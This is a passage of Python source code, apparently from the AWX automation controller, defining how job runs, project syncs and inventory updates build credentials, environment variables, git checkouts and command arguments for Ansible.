d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
logger.info('not parent of others')
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.execution_environment is None:
error = _('Job could not start because no Execution Environment could be found.')
self.update_model(job.pk, status='error', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
if sync_needs:
pu_ig = job.instance_group
pu_en = job.execution_node
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
sync_metafields['scm_clean'] = True # to accomidate force pushes
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
# Case where a local sync is not needed, meaning that local tree is
# up-to-date with project, job is running project current version
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
# ran inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = True
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning('Galaxy role/collection syncing is enabled, but no ' f'credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
continue
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=project_update.instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
'''
Note: We don't support blocking=False
'''
def acquire_lock(self, instance, blocking=True):
lock_path = instance.get_lock_file()
if lock_path is None:
# If from migration or someone blanked local_path for any other reason, recoverable by save
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
# the project update playbook is not in a git repo, but uses a vendoring directory
# to be consistent with the ansible-runner model,
# that is moved into the runner project folder here
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
# submodules copied in loop because shallow copies from local HEADs are ideal
# and no git clone submodule options are compatible with minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Roles and collection folders copy to durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
if 'ANSIBLE_COLLECTIONS_PATHS' in env:
paths = env['ANSIBLE_COLLECTIONS_PATHS'].split(':')
else:
paths = ['~/.ansible/collections', '/usr/share/ansible/collections']
paths.append('/usr/share/automation-controller/collections')
env['ANSIBLE_COLLECTIONS_PATHS'] = os.pathsep.join(paths)
return env
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join(CONTAINER_ROOT, rel_path)
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join(CONTAINER_ROOT, 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, 'inventory', injector.filename)
with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = os.path.join('inventory', injector.filename)
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=inventory_update.execution_node,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occured while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
